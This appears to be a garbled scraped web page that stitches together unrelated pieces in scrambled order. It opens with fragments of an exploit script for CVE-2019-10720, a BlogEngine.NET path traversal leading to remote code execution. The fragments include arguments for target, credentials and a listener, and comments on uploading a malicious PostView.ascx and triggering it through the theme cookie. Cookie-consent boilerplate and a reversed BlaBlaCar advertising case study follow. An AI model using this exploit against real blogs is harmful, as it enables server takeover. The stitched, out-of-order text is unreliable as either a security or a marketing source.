
Parser.add_argument('-s', '-ssl', action="store_true", help="Force SSL") Parser.add_argument('-p', '-passwd', default="admin", action="store", dest="passwd", help='Password for account') Parser.add_argument('-u', '-user', default="admin", action="store", dest="user", help='Account with file upload permissions on blog') Parser.add_argument('-t', '-target', action="store", dest="target", required=True, help='Target host') Parser = argparse.ArgumentParser(description='Exploit CVE-2019-10720 Path traversal + RCE') # protected override void OnLoad(EventArgs e) )ĭef main(target, user, passwd, listener): #static System.IO.StreamWriter streamWriter #Content-Disposition: form-data filename="PostView.ascx" #POST /api/upload?action=filemgr HTTP/1.1 #Using an account that has permissions to Edit Posts, upload a malicious file called `PostView.ascx`: #BlogEngine.NET is vulnerable to a Directory Traversal through the **theme** cookie which triggers a RCE. It does not store any personal data.# Exploit Title: Directory Traversal + RCE on BlogEngine.NET The cookie is set by the GDPR Cookie Consent plugin and is used to store whether or not user has consented to the use of cookies. The cookie is used to store the user consent for the cookies in the category "Performance". This cookie is set by GDPR Cookie Consent plugin. The cookie is used to store the user consent for the cookies in the category "Other. The cookies is used to store the user consent for the cookies in the category "Necessary". The cookie is set by GDPR cookie consent to record the user consent for the cookies in the category "Functional". The cookie is used to store the user consent for the cookies in the category "Analytics". These cookies ensure basic functionalities and security features of the website, anonymously. Necessary cookies are absolutely essential for the website to function properly. We chose this approach to budget allocation, as it has already shown high efficiency earlier. At the same time, 21% was spent on advertising campaigns with a pay-per-click (CPC) model, 72% – with optimized pay-per-1000 impressions (oCPM), 7% – with pay-per-install (CPI). When setting up ads in test regions, 25% of the budget fell on a square video, 75% on a multi-format and a banner. Thus, the only difference between the first group and the second was in the work of the myTarget advertising campaign. At the same time, the audience of the two groups was the same in terms of the number of bookings and their frequency over the past 30 days.Ĭampaigns were launched for test regions in myTarget, and control regions were excluded from impressions on the platform. Mechanicsįor the test, all regions of Russia in which advertising was launched were divided into two groups: test and control. The total cost of attracting post-view bookings (CPA) should not exceed 29 rubles. To do this, the team conducted a special test on the platform for three months.ĭuring the campaign, advertisers planned to analyze how many reservations made after a click on an ad (post-click) would have to be booked after an ad was shown, but without a click on it (post-view). Goals and hypotheses of the advertising campaignĪs part of an advertising campaign in myTarget to promote a mobile application on iOS and Android, experts from the BlaBlaCar road trip marketplace measured the number of post-view bookings (made after viewing ads).
